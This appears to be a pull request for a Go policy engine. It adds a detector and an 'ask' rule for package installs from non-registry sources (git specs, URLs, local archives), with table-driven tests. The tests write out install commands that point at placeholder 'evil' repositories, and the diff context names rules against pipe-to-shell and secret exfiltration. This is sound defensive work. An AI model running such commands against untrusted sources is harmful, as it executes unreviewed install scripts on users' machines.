### PR TITLE
Add non-registry install detector (ATR-14 shell half)

### DIFF
--- a/internal/analyzer/shell/shell.go
+++ b/internal/analyzer/shell/shell.go
@@ -134,6 +134,12 @@ type Analysis struct {
 	// commands that merely name the path (chmod, ls, cp), and it ignores .env.
 	SecretDump SecretConfidence
 
+	// NonRegistryInstall is true when a package manager (npm/yarn/pnpm/bun/pip)
+	// is asked to install from a non-registry source — a git spec, URL, or local
+	// archive — which runs that package's install scripts and skips registry
+	// review. Plain registry installs (`npm install lodash`) never count.
+	NonRegistryInstall bool
+
 	// Raw is the original command text.
 	Raw string
 }
@@ -172,6 +178,22 @@ var (
 		"base64": true, "base32": true,
 		"xxd": true, "od": true, "hexdump": true, "hd": true,
 		"strings": true,
+	}
+	// installValueFlags are package-manager flags whose following token is a
+	// config value (an index/registry URL, a links dir, a requirements file, a
+	// target dir) rather than a package source — so that value must not be
+	// mistaken for an install source. `-e`/`--editable` is deliberately absent:
+	// its value *is* a source (`pip install -e git+https://…`).
+	installValueFlags = map[string]bool{
+		// pip
+		"-i": true, "--index-url": true, "--extra-index-url": true,
+		"-f": true, "--find-links": true, "-c": true, "--constraint": true,
+		"-r": true, "--requirement": true, "-t": true, "--target": true,
+		"--cache-dir": true, "--src": true, "--root": true, "--prefix": true,
+		// npm / yarn / pnpm
+		"--registry": true, "--cache": true, "--userconfig": true,
+		"--globalconfig": true, "--tag": true, "--otp": true,
+		"--dir": true, "-C": true, "--workspace": true, "-w": true,
 	}
 )
 
@@ -305,6 +327,7 @@ func (a *Analysis) inspectCommand(name string, args []string, cwd string) {
 			}
 		}
 	}
+	a.inspectInstall(name, args)
 }
 
 func (a *Analysis) inspectGit(args []string) {
@@ -360,6 +383,107 @@ func (a *Analysis) inspectGit(args []string) {
 			a.HistoryRewrite = true
 		}
 	}
+}
+
+// inspectInstall flags installing a package from a non-registry source (a git
+// spec, URL, or local archive), across npm/yarn/pnpm/bun and pip (including
+// `python -m pip install`). Registry installs like `npm install lodash` or
+// `pip install -r requirements.txt` are left alone.
+func (a *Analysis) inspectInstall(name string, args []string) {
+	rest, ok := installArgs(name, args)
+	if !ok {
+		return
+	}
+	skipNext := false
+	for _, arg := range rest {
+		if skipNext {
+			skipNext = false
+			continue
+		}
+		if strings.HasPrefix(arg, "-") {
+			if installValueFlags[arg] {
+				skipNext = true // its value is config (an index/dir/file), not a source
+			}
+			continue
+		}
+		if isNonRegistrySource(arg) {
+			a.NonRegistryInstall = true
+		}
+	}
+}
+
+// installArgs reports whether name+args is a package-install invocation and, if
+// so, returns the tokens following the install subcommand.
+func installArgs(name string, args []string) ([]string, bool) {
+	switch name {
+	case "npm", "pnpm", "bun":
+		return afterSubcommand(args, "install", "i", "add")
+	case "yarn":
+		return afterSubcommand(args, "add")
+	case "pip", "pip2", "pip3":
+		return afterSubcommand(args, "install")
+	case "python", "python3", "python2":
+		// python -m pip install ...
+		if len(args) >= 2 && args[0] == "-m" && args[1] == "pip" {
+			return afterSubcommand(args[2:], "install")
+		}
+	}
+	return nil, false
+}
+
+// afterSubcommand returns the tokens after the first non-flag token when that
+// token is one of subs; otherwise it reports false. Flags preceding the
+// subcommand (e.g. `npm --loglevel=warn install`) are skipped.
+func afterSubcommand(args []string, subs ...string) ([]string, bool) {
+	for i, arg := range args {
+		if strings.HasPrefix(arg, "-") {
+			continue
+		}
+		for _, s := range subs {
+			if arg == s {
+				return args[i+1:], true
+			}
+		}
+		return nil, false // first non-flag token is not an install subcommand
+	}
+	return nil, false
+}
+
+// isNonRegistrySource reports whether an install operand names a non-registry
+// source — a VCS spec, a hosting shorthand, a file: URL, or a source archive.
+// Plain registry names (`lodash`, `@scope/pkg`, `django==4.2`) return false, and
+// bare index/registry URLs never reach here as sources (inspectInstall skips
+// them as flag values).
+func isNonRegistrySource(arg string) bool {
+	s := strings.TrimSpace(arg)
+	if s == "" {
+		return false
+	}
+	// Version-control specs.
+	if strings.HasPrefix(s, "git+") || strings.HasPrefix(s, "git://") || strings.HasPrefix(s, "git@") {
+		return true
+	}
+	// Hosting shorthands (npm) and the file: protocol.
+	for _, p := range []string{"github:", "gitlab:", "bitbucket:", "gist:", "file:"} {
+		if strings.HasPrefix(s, p) {
+			return true
+		}
+	}
+	// A source archive, local or remote (pkg.tgz, x.tar.gz, y.whl, …).
+	return hasArchiveExt(s)
+}
+
+func hasArchiveExt(s string) bool {
+	// Drop any URL query/fragment before checking the extension.
+	if i := strings.IndexAny(s, "?#"); i >= 0 {
+		s = s[:i]
+	}
+	for _, ext := range []string{".tgz", ".tar.gz", ".tar.bz2", ".tar.xz", ".tar", ".whl", ".zip"} {
+		if strings.HasSuffix(s, ext) {
+			return true
+		}
+	}
+	return false
 }
 
 // resolveCommand returns the effective command name and its arguments, peeling

--- a/internal/analyzer/shell/shell_test.go
+++ b/internal/analyzer/shell/shell_test.go
@@ -116,6 +116,61 @@ func TestPipeToShellFromNet(t *testing.T) {
 	}
 }
 
+func TestNonRegistryInstall(t *testing.T) {
+	cases := []struct {
+		name    string
+		command string
+		want    bool
+	}{
+		// Non-registry sources — git, URL, hosting shorthand, local archive.
+		{"npm git+https", "npm i git+https://github.com/evil/pkg", true},
+		{"npm install git+ssh", "npm install git+ssh://git@github.com/evil/pkg.git", true},
+		{"npm github shorthand", "npm i github:evil/pkg", true},
+		{"npm local tgz", "npm install ./vendor/pkg.tgz", true},
+		{"npm global git", "npm i -g git+https://evil/pkg", true},
+		{"yarn add tarball url", "yarn add https://example.com/pkg.tar.gz", true},
+		{"pnpm add file", "pnpm add file:../local-pkg", true},
+		{"bun add git", "bun add git+https://evil/pkg", true},
+		{"pip git+https", "pip install git+https://github.com/evil/pkg", true},
+		{"pip3 git", "pip3 install git+https://x", true},
+		{"pip editable git", "pip install -e git+https://x#egg=y", true},
+		{"pip local wheel", "pip install ./dist/pkg-1.0-py3-none-any.whl", true},
+		{"python -m pip git", "python3 -m pip install git+https://x", true},
+
+		// Registry installs and config-flag values — must not flag.
+		{"npm install bare", "npm install", false},
+		{"npm install pkg", "npm install lodash", false},
+		{"npm install several", "npm i react react-dom", false},
+		{"npm scoped pkg", "npm install @types/node", false},
+		{"npm versioned", "npm install lodash@^4.17.0", false},
+		{"npm registry flag url", "npm install --registry https://reg.local lodash", false},
+		{"npm ci uses lockfile", "npm ci", false},
+		{"yarn install lockfile", "yarn install", false},
+		{"npm run script named postinstall", "npm run postinstall", false},
+		{"pip requirements file", "pip install -r requirements.txt", false},
+		{"pip constraint file", "pip install -c constraints.txt flask", false},
+		{"pip versioned", "pip install django==4.2", false},
+		{"pip index-url value", "pip install --index-url https://my.pypi/simple requests", false},
+		{"pip find-links archive value", "pip install --find-links ./wheels/foo.whl tensorflow", false},
+		{"pip editable local project", "pip install -e .", false},
+		{"pip current dir", "pip install .", false},
+		{"pip download not install", "pip download requests", false},
+		{"bare git url, no installer", "git+https://x", false},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.name, func(t *testing.T) {
+			a := Analyze(tc.command, "/work")
+			if !a.Parsed {
+				t.Fatalf("command did not parse: %q", tc.command)
+			}
+			if a.NonRegistryInstall != tc.want {
+				t.Errorf("NonRegistryInstall = %v, want %v", a.NonRegistryInstall, tc.want)
+			}
+		})
+	}
+}
+
 func TestForkBomb(t *testing.T) {
 	cases := []struct {
 		name    string

--- a/internal/policy/builtin/recommended.yaml
+++ b/internal/policy/builtin/recommended.yaml
@@ -81,6 +81,18 @@ rules:
       shell:
         pipe_to_shell: true
 
+  - id: install-from-non-registry-source
+    description: Installing a package from a non-registry source (git, URL, or local archive)
+    severity: high
+    effect: ask
+    message: >-
+      A package is being installed from outside the registry — a git repo, URL,
+      or local archive — which runs that package's install scripts and skips
+      registry review. Confirm you trust the source.
+    match:
+      shell:
+        non_registry_install: true
+
   - id: secret-exfiltration-high
     description: Reading a private key or cloud credential and sending it to the network
     severity: critical

--- a/internal/policy/engine.go
+++ b/internal/policy/engine.go
@@ -162,6 +162,9 @@ func matchShell(m *ShellMatch, a *shell.Analysis) bool {
 	if m.ForkBomb && !a.ForkBomb {
 		return false
 	}
+	if m.NonRegistryInstall && !a.NonRegistryInstall {
+		return false
+	}
 	if m.SecretExfil != "" {
 		// Exfiltration = a secret is read AND data leaves over the network.
 		if !a.NetEgress || a.SecretRead == shell.SecretNone {

--- a/internal/policy/engine_test.go
+++ b/internal/policy/engine_test.go
@@ -58,6 +58,44 @@ func TestRecommendedShellDecisions(t *testing.T) {
 	}
 }
 
+func TestRecommendedInstallDecisions(t *testing.T) {
+	e := recommendedEngine(t)
+
+	cases := []struct {
+		command string
+		want    Effect
+		rule    string
+	}{
+		// Non-registry installs -> ask.
+		{"npm i git+https://github.com/evil/pkg", EffectAsk, "install-from-non-registry-source"},
+		{"pip install git+https://x", EffectAsk, "install-from-non-registry-source"},
+		{"npm install ./vendor/pkg.tgz", EffectAsk, "install-from-non-registry-source"},
+		{"python3 -m pip install git+https://x", EffectAsk, "install-from-non-registry-source"},
+		// Registry installs -> allow (no false positives).
+		{"npm install", EffectAllow, ""},
+		{"npm install lodash", EffectAllow, ""},
+		{"pip install -r requirements.txt", EffectAllow, ""},
+		{"pip install --index-url https://my.pypi/simple requests", EffectAllow, ""},
+		{"npm ci", EffectAllow, ""},
+	}
+
+	for _, tc := range cases {
+		t.Run(tc.command, func(t *testing.T) {
+			d := e.Evaluate(Action{Kind: ActionShell, Command: tc.command, Cwd: "/work"})
+			if d.Effect != tc.want {
+				t.Fatalf("Effect = %q, want %q", d.Effect, tc.want)
+			}
+			gotRule := ""
+			if d.Rule != nil {
+				gotRule = d.Rule.ID
+			}
+			if gotRule != tc.rule {
+				t.Errorf("deciding rule = %q, want %q", gotRule, tc.rule)
+			}
+		})
+	}
+}
+
 func TestRecommendedForkBombDecisions(t *testing.T) {
 	e := recommendedEngine(t)
 

--- a/internal/policy/rule.go
+++ b/internal/policy/rule.go
@@ -53,6 +53,7 @@ type ShellMatch struct {
 	HistoryRewrite     bool     `yaml:"history_rewrite,omitempty"`
 	PipeToShell        bool     `yaml:"pipe_to_shell,omitempty"`
 	ForkBomb           bool     `yaml:"fork_bomb,omitempty"`
+	NonRegistryInstall bool     `yaml:"non_registry_install,omitempty"`
 	SecretExfil        string   `yaml:"secret_exfil,omitempty"` // high|any
 	SecretRead         string   `yaml:"secret_read,omitempty"`  // high|any — a reader command dumps a secret to stdout
 	CommandIn          []string `yaml:"command_in,omitempty"`


### PR DESCRIPTION
The **shell half of ATR-14**. The `file_write` manifest-hook-injection half needs an `Action.Content` extension and is tracked separately in **ATR-26**.

## What it catches

Installing a package from **outside the registry** — which runs that package's install scripts and skips registry review. New `NonRegistryInstall` analyzer fact + `non_registry_install` `ShellMatch` predicate + recommended rule (**ask**).

`inspectInstall` recognises `npm`/`yarn`/`pnpm`/`bun` and `pip` (including `python -m pip install`), finds the install subcommand, and flags operands that are **unambiguous** non-registry sources:
- VCS specs — `git+…`, `git://…`, `git@…`
- hosting shorthands — `github:`/`gitlab:`/`bitbucket:`/`gist:`
- `file:` URLs
- source archives — `.tgz`/`.tar.gz`/`.whl`/…

## Near-zero false positives (verified)

The FP trap here is misreading a **config-flag value** (an index/registry URL, a find-links dir) as a source. `inspectInstall` skips the values of `--index-url`/`--find-links`/`-r`/`-c`/`--registry`/… (but **not** `-e`/`--editable`, whose value *is* a source).

| Command | Decision |
|---|---|
| `npm i git+https://…`, `pip install git+https://…`, `npm install ./pkg.tgz`, `npm i github:u/r` | **ask** |
| `python3 -m pip install git+https://x` | **ask** |
| `npm install lodash`, `npm install`, `npm ci`, `pip install -r requirements.txt` | allow |
| `npm install --registry https://reg.local lodash` | allow (flag value) |
| `pip install --find-links ./wheels/foo.whl tensorflow` | allow (flag value) |

Effect is `ask` — a git/URL install is sometimes legitimate.

Table-driven tests cover ~30 analyzer cases + engine decisions. `gofmt -s`, `go vet`, `go build`, `go test ./...` all clean.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01NBjdLzSDww859nrM7pQnjT